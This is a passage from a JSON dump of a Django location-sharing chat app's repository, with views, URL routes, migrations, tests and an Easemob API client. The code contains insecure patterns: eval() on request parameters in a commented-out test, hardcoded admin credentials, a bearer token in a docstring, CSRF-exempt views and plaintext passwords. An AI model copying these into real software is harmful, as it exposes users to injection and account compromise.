0}))\n\n fr = FriendRelationService.getFriendRelationByCondition(user_from_id,user_to_id)\n fr.inBlackList = inBlackList\n fr.remark = remark\n fr.top = top\n fr.save()\n\n return HttpResponse(json.dumps({\"result\":1}))\n\n return HttpResponse(json.dumps({\"result\":-1}))\n\n\n#用户登录状态的test\n# def test1(request):\n# UserId = eval(request.GET['UserId'])\n# PassWord = eval(request.GET['PassWord'])\n# str = UserRegister(UserId,PassWord)\n# return HttpResponse(str)\n# def test2(request):\n# str = UserLogin(request)\n# return HttpResponse(str)\n# def test3(request):\n# if UserVerify(request):\n# return HttpResponse(\"is login\")\n# else:\n# return HttpResponse(\"isn't login\")\n# def test4(request):\n# str = UserLogoff(request)\n# return HttpResponse(str)\n\n@csrf_exempt\ndef addUserToGroup(request):\n if UserVerify(request):\n new_group_user_id = request.POST['new_group_user_id']\n group_id = request.POST['group_id']\n time = datetime.datetime.now()\n gr = {'user_id':new_group_user_id,'group_id':group_id,'time':time}\n GroupRelationService.newGroupRelation(**gr)\n new_group_user = UserService.getUserById(new_group_user_id)\n new_group_user.contacts_version = new_group_user.contacts_version+1\n new_group_user.save()\n return HttpResponse(json.dumps({\"result\":1}))\n\n return HttpResponse(json.dumps({\"result\":-1}))\n\n@csrf_exempt\ndef deleteUserToGroup(request):\n if UserVerify(request):\n user_id = request.session['user_id']\n group_id = request.POST['group_id']\n GroupRelationService.deleteGroupRelationByCondition(user_id,group_id)\n\n user = UserService.getUserById(user_id)\n user.contacts_version = user.contacts_version+1\n user.save()\n return HttpResponse(json.dumps({\"result\":1}))\n\n return HttpResponse(json.dumps({\"result\":-1}))\n\n@csrf_exempt\ndef deleteFriendRelation(request):\n if UserVerify(request):\n user_id = request.session['user_id']\n user_to_id = request.POST['user_to_id']\n FriendRelationService.deleteFriendRelation(user_id,user_to_id)\n\n user = UserService.getUserById(user_id)\n user.contacts_version = user.contacts_version+1\n user.save()\n return HttpResponse(json.dumps({\"result\":1}))\n\n return HttpResponse(json.dumps({\"result\":-1}))\n\n@csrf_exempt\ndef newAgroup(request):\n if UserVerify(request):\n user_id = request.session['user_id']\n name = request.POST['name']\n code = int(random.uniform(100000, 999999))\n group = {'name':name,'ucount':1,'code':code,'creater_id':user_id}\n new_group = GroupService.newGroup(**group)\n group_id = new_group.id\n time =datetime.datetime.now()\n gr = {'group_id':group_id,'user_id':user_id,'time':time}\n new_group = GroupRelationService.newGroupRelation(**gr)\n dic_group = new_group.toDict()\n user = UserService.getUserById(user_id)\n user.contacts_version = user.contacts_version+1\n user.save()\n return HttpResponse(json.dumps({\"result\":1,'new_group':dic_group}))\n\n return HttpResponse(json.dumps({\"result\":-1}))\n"
},
{
"alpha_fraction": 0.741679847240448,
"alphanum_fraction": 0.741679847240448,
"avg_line_length": 38.5,
"blob_id": "6f9e160e173846e52684d7463dd8f885f19b29be",
"content_id": "726043eb88bcacb96021d0e1629dba5539d6546c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 631,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 16,
"path": "/zzc/Distance/js/position.js",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "var closePosotiondiv = function() {\n\tdocument.getElementById(\"showPositonMsg\").style.display = \"none\";\n\tdocument.getElementById(\"Positionmarkdiv\").style.display = \"none\";\n}\nvar showPosotiondiv = function() {\n\tdocument.getElementById(\"showPositonMsg\").style.display = \"\";\n\tdocument.getElementById(\"Positionmarkdiv\").style.display = \"\";\n}\nvar tochatdiv = function() {\n\tdocument.getElementById(\"container\").style.display = \"none\";\n\tdocument.getElementById(\"slider\").style.display = \"\";\n}\nvar toMapdiv = function() {\n\tdocument.getElementById(\"container\").style.display = \"\";\n\tdocument.getElementById(\"slider\").style.display = \"none\";\n}"
},
{
"alpha_fraction": 0.5753755569458008,
"alphanum_fraction": 0.6196351647377014,
"avg_line_length": 41.375,
"blob_id": "955c901b2381cf02f31bd3350910970a5314fa1b",
"content_id": "4c6dca393f795afb1aebfc386112bb51adfd7c8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3842,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 88,
"path": "/zzc/adam2014/JoinModels/__init__.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.Service.FriendRelationService import *\nfrom adam2014.models import User\nfrom adam2014.models import AddFriend\nfrom adam2014.models import FriendRelation\nimport datetime\nimport django.db.transaction\n\nclass UserServiceTest(TestCase):\n def setUp(self):\n #构造user\n self.user = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"13570517278\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"13570517279\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n self.user3 = {\"id\":3,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"13570517279\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111113\"}\n User.objects.create(**self.user)\n User.objects.create(**self.user2)\n User.objects.create(**self.user3)\n\n self.time = datetime.datetime.now()\n self.inBlackList = False;\n self.top = False;\n\n # 构造好友关系\n self.addfriend1 = {\"id\":1,\"user_from_id\":1,\"user_to_id\":2,\"time\":str(self.time)}\n self.addfriend2 = {\"id\":2,\"user_from_id\":1,\"user_to_id\":3,\"time\":str(self.time)}\n self.addfriend3 = {\"id\":3,\"user_from_id\":1,\"user_to_id\":4,\"time\":str(self.time)}\n self.addfriend4 = {\"id\":4,\"user_from_id\":2,\"user_to_id\":3,\"time\":str(self.time)}\n\n AddFriend.objects.create(**self.addfriend1)\n AddFriend.objects.create(**self.addfriend2)\n AddFriend.objects.create(**self.addfriend3)\n AddFriend.objects.create(**self.addfriend4)\n\n self.friendRelation1 = {\"id\":1,\"user_from_id\":1,\"user_to_id\":2,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n self.friendRelation2 = {\"id\":2,\"user_from_id\":2,\"user_to_id\":1,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n self.friendRelation3 = {\"id\":3,\"user_from_id\":2,\"user_to_id\":3,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n self.friendRelation4 = {\"id\":4,\"user_from_id\":2,\"user_to_id\":4,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n\n # FriendRelation.objects.create(**self.friendRelation1)\n FriendRelation.objects.create(**self.friendRelation2)\n FriendRelation.objects.create(**self.friendRelation3)\n FriendRelation.objects.create(**self.friendRelation4)\n\n\n def testNewRelation(self):\n\n # 错误情况:2和4不是好友,此时插入关系service会返回error值\n #print newRelation(**self.friendRelation4)\n\n # 正确情况:1和2是好友 (插入时,不能create relation否则数据库会报重复插入错误)\n print newRelation(**self.friendRelation1)\n\n def testGetRelation(self):\n\n print getRelation(2)\n\n def testDelteRelation(self):\n\n print \"test delete relation\"\n print \"before test start\"\n print len(FriendRelation.objects.all())\n\n deleteRelation(2)\n\n print \"after test start\"\n print len(FriendRelation.objects.all())\n\n def testUpdateRelation(self):\n\n print \"test update relation\"\n print \"before test\"\n print getRelation(2)\n\n self.friendRelation2['remark'] = \"super God Kun\"\n updateRelation(**self.friendRelation2)\n\n print \"after test\"\n print getRelation(2)"
},
{
"alpha_fraction": 0.6703125238418579,
"alphanum_fraction": 0.6890624761581421,
"avg_line_length": 31.049999237060547,
"blob_id": "4138f74a17dd0b36b9d49b958edcda4bb41ea060",
"content_id": "ffee457594de8ae7302328b8d5721be68b9e331b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 640,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 20,
"path": "/zzc/zzc/urls.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'zzc.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^adam2014/',include('adam2014.urls',namespace=\"adam2014\")),\n # url(r'^media\\/(?P<path>.*)$', 'django.views.media.serve'),\n) \n\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\n# ... the rest of your URLconf goes here ...\n\nurlpatterns += staticfiles_urlpatterns()"
},
{
"alpha_fraction": 0.5454545617103577,
"alphanum_fraction": 0.5454545617103577,
"avg_line_length": 21,
"blob_id": "d23128d2f8aba365bb8d6756d86f0fc24d85fda5",
"content_id": "29f1c9dc9535d9d17673c591a35c71942e2292bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 1,
"path": "/zzc/adam2014/auth/__init__.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'assiso'\n"
},
{
"alpha_fraction": 0.5406538248062134,
"alphanum_fraction": 0.6010058522224426,
"avg_line_length": 36.1875,
"blob_id": "e19cd57eb108f18fcfeed7219f502340b0da9ff3",
"content_id": "3df43cc2c3d8ed03a58db97b14be742c89634081",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1193,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 32,
"path": "/zzc/adam2014/DAO/JoinDAO/Group_userDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'user'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom django.db import connection\nfrom adam2014.JoinModels import Group_user\n\ndef getGroup_userListView(group_id):\n sql = \"select adam2014_grouprelation.id,adam2014_grouprelation.time,\" \\\n \"adam2014_grouprelation.user_id,adam2014_user.nickname,adam2014_user.photo,adam2014_user.phone,\" \\\n \"adam2014_user.longitude,adam2014_user.latitude,adam2014_user.code\" \\\n \" from adam2014_grouprelation,adam2014_user \" \\\n \"where adam2014_grouprelation.group_id = %s and adam2014_user.id = adam2014_grouprelation.user_id ;\"\n\n cursor = connection.cursor()\n cursor.execute(sql,[group_id])\n #row = cursor.fetchone()\n row = cursor.fetchall()\n\n GUs= []\n i = 0\n for i in range(len(row)):\n GUs.append(Group_user.Group_user(str(row[i][0]),str(row[i][1]),\n str(row[i][2]),str(row[i][3]),str(row[i][4]),str(row[i][5]),\n str(row[i][6]),str(row[i][7]),str(row[i][8])))\n i+=1\n return GUs\n\n\n\n"
},
{
"alpha_fraction": 0.7536900639533997,
"alphanum_fraction": 0.7702952027320862,
"avg_line_length": 36.379310607910156,
"blob_id": "b0bcd073a26e1ff05d04e2215b30a9af1341b017",
"content_id": "dcc6594857d9b9c973bc311ded6c826d6602b66e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1084,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 29,
"path": "/zzc/zzc/wsgi.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "\"\"\"\nWSGI config for zzc project.\n\nIt exposes the WSGI callable as a module-level variable named ``application``.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/howto/deployment/wsgi/\n\"\"\"\n\nimport os\nimport sys\n#Calculate the path based on the location of the WSGI script. \napache_configuration= os.path.dirname(__file__) \nproject = os.path.dirname(apache_configuration) \nworkspace = os.path.dirname(project) \nsys.path.append(workspace)\n\nsys.path.append('C:\\Program Files (x86)\\Apache Software Foundation\\Apache2.2\\htdocs\\zzc\\zzc\\zzc')\nsys.path.append('C:\\Program Files (x86)\\Apache Software Foundation\\Apache2.2\\htdocs\\zzc\\zzc')\nsys.path.append('C:\\Program Files (x86)\\Apache Software Foundation\\Apache2.2\\htdocs')\nsys.path.append('C:\\Program Files (x86)\\Apache Software Foundation\\Apache2.2\\htdocs\\zzc')\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nfrom django.core.wsgi import get_wsgi_application\napplication = get_wsgi_application()\n# import django.core.handlers.wsgi\n\n# application = django.core.handlers.wsgi.WSGIHandler()\n"
},
{
"alpha_fraction": 0.6146562099456787,
"alphanum_fraction": 0.6241251826286316,
"avg_line_length": 19.743589401245117,
"blob_id": "d8a1d48eb9a52f172928a1a239c99cbd698d0323",
"content_id": "01b37cd1296fa463dffd6e3c1120f6e41b964705",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2663,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 117,
"path": "/zzc/adam2014/urls.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# URLconf\nfrom django.conf.urls import patterns ,url ,include\n\nfrom adam2014 import views\n\nurlpatterns = patterns(\"\", \n \turl(r'^hello$',views.helloworld,name='helloworld'),\n\n \t# 手机验证\n \t# GET\n \t# {phonenum, verifycode, .... }\n \turl(r'^register$', views.register, name='register'),\n\n \t# 基本信息\n \t# POST\n \t# {nickname, passoword, sex, age, ...}\n \t#url(r'^register$', views.register, name='register'),\n\n \t# 登陆\n \t# GET\n \t# {phonenum, password}\n \turl(r'^signin$', views.signin, name='signin'),\n\t\n \t# 更新通讯录\n \t# GET\n \t#url(r'^F5contact$', views.F5contact, name='F5contact'),\n\t\n \t# 刷新所有人位置\n \t# GET\n \t#url(r'^F5allPSN$', views.F5allPSN, name='F5allPSN'),\n\t\n \t# 快速获取单人地理位置\n \t# GET\n \t# {id}\n \turl(r'^getPSN$', views.getPSN, name='getPSN'),\n\n \t# 修改个人信息\n \t# POST\n \t# {nickname, sex, age, ....}\n \turl(r'^editinfo$', views.editinfo, name='editinfo'),\n\n \t# 更改头像\n \t# POST\n \turl(r'^editphoto$', views.editphoto, name='editphoto'),\n\n \t# 添加好友\n \t# POST\n \t# {request_user_phone}\n \turl(r'^addfriend$', views.addfriend, name='addfriend'),\n\n\n \t# 确认添加好友\n \t# POST\n \t# {confirmed,request_user_phone,self_user_phone}\n \turl(r'^confirm_addfriend$', views.confirm_addfriend, name='confirm_addfriend'),\n\n \t# 邀请好友\n \t# POST\n \t# {phonenum, name}\n \turl(r'^invitefriend$', views.invitefriend, name='invitefriend'),\n\n \t# 分享位置\n \t# POST\n \t# {PSN}\n \turl(r'^updatePSN$', views.updatePSN, name='updatePSN'),\n\n \t# 修改好友权限\n \t# POST\n \t# {top, block, delete, alias}\n \turl(r'^setfriend$', views.setfriend, name='setfriend'),\n\n # 用户登陆状态的test\n #url(r'^test1$', views.test1, name='test1'),\n # url(r'^test2/$', views.test2, name='test2'),\n # url(r'^test3/$', views.test3, name='test3'),\n # url(r'^test4/$', views.test4, name='test4'),\n\n\n #退出登陆\n # POST\n url(r'^signout', views.signout, name='signout'),\n\n #获得好友列表和好友详细信息,还有用户所加入的群组\n # POST\n url(r'^getFRandGroups', views.getFRandGroups, name='getFRandGroups'),\n\n\n #新建群组\n # POST\n url(r'^newAgroup', views.newAgroup, name='newAgroup'),\n\n #加人入群\n # POST\n url(r'^addUserToGroup', views.addUserToGroup, name='addUserToGroup'),\n\n #用户退群\n # POST\n url(r'^deleteUserToGroup', views.deleteUserToGroup, name='deleteUserToGroup'),\n\n #删除好友\n # POST\n url(r'^deleteFriendRelation', views.deleteFriendRelation, name='deleteFriendRelation'),\n\n\n\n\n\n\n\n\n #readSession\n url(r'^readSession', views.readSession, name='readSession'),\n\n\t)\n\n\n"
},
{
"alpha_fraction": 0.49236205220222473,
"alphanum_fraction": 0.5047879815101624,
"avg_line_length": 36.81034469604492,
"blob_id": "9683b70a430ba1b807848d4120fd98e3b275e103",
"content_id": "56aee81059d61e8216f6cc159977996da450ad86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8772,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 232,
"path": "/zzc/adam2014/migrations/0001_initial.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='AddFriend',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('user_to_id', models.IntegerField()),\n ('time', models.DateTimeField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='BottlePicture',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('usedTimes', models.IntegerField()),\n ('tookTime', models.DateTimeField()),\n ('author', models.CharField(max_length=32, null=True)),\n ('content', models.TextField()),\n ('longitude', models.DecimalField(null=True, max_digits=8, decimal_places=5)),\n ('latitude', models.DecimalField(null=True, max_digits=8, decimal_places=5)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='FriendRelation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('user_to_id', models.IntegerField()),\n ('time', models.DateTimeField()),\n ('inBlackList', models.BooleanField(default=None)),\n ('remark', models.CharField(max_length=16)),\n ('top', models.BooleanField(default=None)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Group',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=32)),\n ('ucount', models.IntegerField()),\n ('code', models.CharField(max_length=20)),\n ('creater_id', models.IntegerField(null=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='GroupMessage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('time', models.DateTimeField()),\n ('group_to', models.ForeignKey(to='adam2014.Group')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='GroupRelation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('time', models.DateTimeField()),\n ('group', models.ForeignKey(to='adam2014.Group')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ImmediatelyMessage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('user_to_id', models.IntegerField()),\n ('time', models.DateTimeField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='LocationMessage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('content', models.TextField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Message',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('time', models.DateTimeField(default=datetime.datetime(2014, 12, 5, 1, 57, 55, 585319))),\n ('type', models.IntegerField()),\n ('content_id', models.IntegerField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='PictureMessage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('content', models.TextField()),\n ('message', models.ForeignKey(to='adam2014.Message', null=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='TextMessage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('content', models.TextField()),\n ('message', models.ForeignKey(to='adam2014.Message', null=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='User',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('password', models.CharField(max_length=16)),\n ('nickname', models.CharField(max_length=32)),\n ('photo', models.TextField()),\n ('phone', models.CharField(max_length=16)),\n ('contacts_version', models.CharField(max_length=15, null=True)),\n ('longitude', models.DecimalField(null=True, max_digits=8, decimal_places=5)),\n ('latitude', models.DecimalField(null=True, max_digits=8, decimal_places=5)),\n ('code', models.CharField(max_length=20)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='VoiceMessage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('content', models.TextField()),\n ('message', models.ForeignKey(to='adam2014.Message', null=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='locationmessage',\n name='message',\n field=models.ForeignKey(to='adam2014.Message', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='immediatelymessage',\n name='message',\n field=models.ForeignKey(to='adam2014.Message'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='immediatelymessage',\n name='user_from',\n field=models.ForeignKey(to='adam2014.User'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='grouprelation',\n name='user',\n field=models.ForeignKey(to='adam2014.User'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='groupmessage',\n name='message',\n field=models.ForeignKey(to='adam2014.Message'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='groupmessage',\n name='user_from',\n field=models.ForeignKey(to='adam2014.User'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='group',\n name='users',\n field=models.ManyToManyField(to='adam2014.User', through='adam2014.GroupRelation'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='friendrelation',\n name='user_from',\n field=models.ForeignKey(to='adam2014.User'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='bottlepicture',\n name='user',\n field=models.ForeignKey(to='adam2014.User', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='addfriend',\n name='user_from',\n field=models.ForeignKey(to='adam2014.User'),\n preserve_default=True,\n ),\n ]\n"
},
{
"alpha_fraction": 0.6830508708953857,
"alphanum_fraction": 0.691525399684906,
"avg_line_length": 21.730770111083984,
"blob_id": "32c62d1588d42975ae7975cc4934052f6b6dd6d0",
"content_id": "8c05fc34a65cd1bf887dacbb7df91662e85e0383",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 590,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 26,
"path": "/zzc/adam2014/Service/JoinService/FriendRelationListViewService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'user'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.DAO.JoinDAO import FriendRelationListViewDAO\n\ndef getFriendRelationListView(user_id):\n frs = []\n try:\n frs = FriendRelationListViewDAO.getFriendRelationListView(user_id)\n except:\n pass\n return frs\n\ndef getAfriendRelationView(user_from_id,user_to_id):\n frs = []\n try:\n frs = FriendRelationListViewDAO.getAfriendRelationView(user_from_id,user_to_id)\n except:\n pass\n return frs"
},
{
"alpha_fraction": 0.6033321022987366,
"alphanum_fraction": 0.6083863973617554,
"avg_line_length": 31.14457893371582,
"blob_id": "1cd456cc1adabe350249c4defba2441d3c5a6492",
"content_id": "b8383d850305b9df231d9b362969063bb2e1d94f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6112,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 166,
"path": "/zzc/adam2014/IM/easemob_server_python.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# -*- coding: utf-8 -*- \n__author__ = 'lao605'\n\nimport requests\nimport json\nfrom time import time\nfrom requests.auth import AuthBase\nimport string\nimport random\n\nJSON_HEADER = {'content-type': 'application/json',\"Accept\":\"application/json\"}\n# EASEMOB_HOST = \"http://localhost:8080\"#\nEASEMOB_HOST = \"https://a1.easemob.com\"\n\nDEBUG = False\n\ndef parse_appkey(appkey):\n \"\"\"解析appkey, 从中得到org和app, 注意, appkey的规则是 {org}#{app}\"\"\"\n return tuple(appkey.split('#'))\n\ndef post(url, payload, auth=None):\n r = requests.post(url, data=json.dumps(payload), headers=JSON_HEADER, auth=auth)\n return http_result(r)\n\ndef get(url, auth=None):\n r = requests.get(url, headers=JSON_HEADER, auth=auth)\n return http_result(r)\n\ndef delete(url, auth=None):\n r = requests.delete(url, headers=JSON_HEADER, auth=auth)\n return http_result(r)\n\n\ndef http_result(r):\n if DEBUG:\n error_log = {\n \"method\": r.request.method,\n \"url\": r.request.url,\n \"request_header\": dict(r.request.headers),\n \"response_header\": dict(r.headers),\n \"response\": r.text\n }\n if r.request.body:\n error_log[\"payload\"] = r.request.body\n print json.dumps(error_log)\n\n if r.status_code == requests.codes.ok:\n return True, r.json()\n else:\n return False, r.text\n\nclass Token:\n \"\"\"表示一个登陆获取到的token对象\"\"\"\n def __init__(self, token, exipres_in):\n self.token = token\n self.exipres_in = exipres_in + int(time())\n \n def is_not_valid(self):\n \"\"\"这个token是否还合法, 或者说, 是否已经失效了, 这里我们只需要\n 检查当前的时间, 是否已经比或者这个token的时间过去了exipreis_in秒\n \n 即 current_time_in_seconds < (expires_in + token_acquired_time)\n \"\"\"\n return time() > self.exipres_in\n\nclass EasemobAuth(AuthBase):\n \"\"\"环信登陆认证的基类\"\"\"\n \n# 实现__call__函数,这个类型就成为可调用的。\n# 换句话说,我们可以把这个类的对象当作函数来使用,相当于重载了括号运算符。\n def __call__(self, r):\n # 这个r对应的一个是\n r.headers['Authorization'] = 'Bearer ' + self.get_token()\n return r \n \n def get_token(self):\n \"\"\"在这里我们先检查是否已经获取过token, 并且这个token有没有过期\"\"\"\n if (self.token is None) or (self.token.is_not_valid()):\n self.token = self.acquire_token() #refresh the token\n return self.token.token\n \n def acquire_token(self):\n \"\"\"真正的获取token的方法, 返回值是一个我们定义的Token对象\n 这个留给子类去实现\n \"\"\"\n pass\n \nclass OrgAdminAccountAuth(EasemobAuth):\n \"\"\"使用org的管理员账号和密码来获取token, \n 和上面不同的是, 这里获取的是整个org的管理员账号, \n 所以并没有appkey的概念\n \n 并且, 因为没有appkey的概念, 所以, URL也不相同, \n 这里使用的URL是 https://a1.easemob.com/management/token\n \n 而app级别的token都是从 https://a1.easemob.com/{org}/{app}/token\n 这个URL去获取的\n \"\"\"\n def __init__(self, username, password):\n super(OrgAdminAccountAuth, self).__init__()\n # 相当于执行了\n # self.heade3rs['Authorization'] = 'Bearer ' + OrgAdminAccountAuth.get_token()\n # return self\n self.username = username\n self.password = password\n self.url = EASEMOB_HOST+\"/management/token\"\n self.token = None\n \n def acquire_token(self):\n \"\"\"\n 使用 username / password 来获取token, 具体的REST API为\n \n POST /management/token {'grant_type':'password', 'username':'xxxx', 'password':'xxxxx'}\n \"\"\"\n payload = {'grant_type':'password', 'username': self.username, 'password': self.password}\n success, result = post(self.url, payload)\n if success:\n return Token(result['access_token'], result['expires_in'])\n else:\n # throws exception\n pass\n\ndef register_new_user(org, app, auth, username, password):\n \"\"\"注册新的app用户\n POST /{org}/{app}/users {\"username\":\"xxxxx\", \"password\":\"yyyyy\"}\n \"\"\"\n payload = {\"username\":username, \"password\":password}\n url = EASEMOB_HOST+(\"/%s/%s/users\" % (org, app))\n return post(url, payload, auth)\n \ndef delete_user(org, app, auth, username):\n \"\"\"删除app用户\n DELETE /{org}/{app}/users/{username}\n \"\"\"\n url = EASEMOB_HOST+(\"/%s/%s/users/%s\" % (org, app, username))\n return delete(url, auth)\n\ndef send_file(org, app, auth, file_path, secret=True):\n \"\"\"上传文件\n 上传文件\n curl --verbose --header \"Authorization: Bearer YWMtz1hFWOZpEeOPpcmw1FB0RwAAAUZnAv0D7y9-i4c9_c4rcx1qJDduwylRe7Y\" \\\n --header \"restrict-access:true\" --form file=@/Users/stliu/a.jpg \\\n http://a1.easemob.com/easemob-demo/chatdemoui/chatfiles\n \"\"\"\n url = EASEMOB_HOST+(\"/%s/%s/chatfiles\" % (org, app))\n # files = {'file': open(file_path, 'rb')}\n files = {'file': ('report.xls', open(file_path, 'rb'), 'image/jpeg', {'Expires': '0'})}\n\n r = requests.post(url, files=files, auth=auth)\n return http_result(r)\n \n# REST client就是调用REST API的程序端,可以使调用方式有多种:Linux curl、浏览器、编程语言http请求访问实现等.\n# 在调用环信的后台服务之前, 需要先登陆获取token(oauth2.0), 而根据请求发起人的角色不同, 获取token的方式也不同\n\ndef addEasemobUser(username,password):\n org = \"zzc\"\n app = \"zzc\"\n org_admin_username = \"zzcadmin\"\n org_admin_password = \"zzcadmin\"\n org_admin_auth = OrgAdminAccountAuth(org_admin_username, org_admin_password)\n success, result = register_new_user(org, app, org_admin_auth, username, password)\n if success:\n return \"Success\"\n else:\n return \"False\"\n\n \n\n"
},
{
"alpha_fraction": 0.7121211886405945,
"alphanum_fraction": 0.7242424488067627,
"avg_line_length": 23.481481552124023,
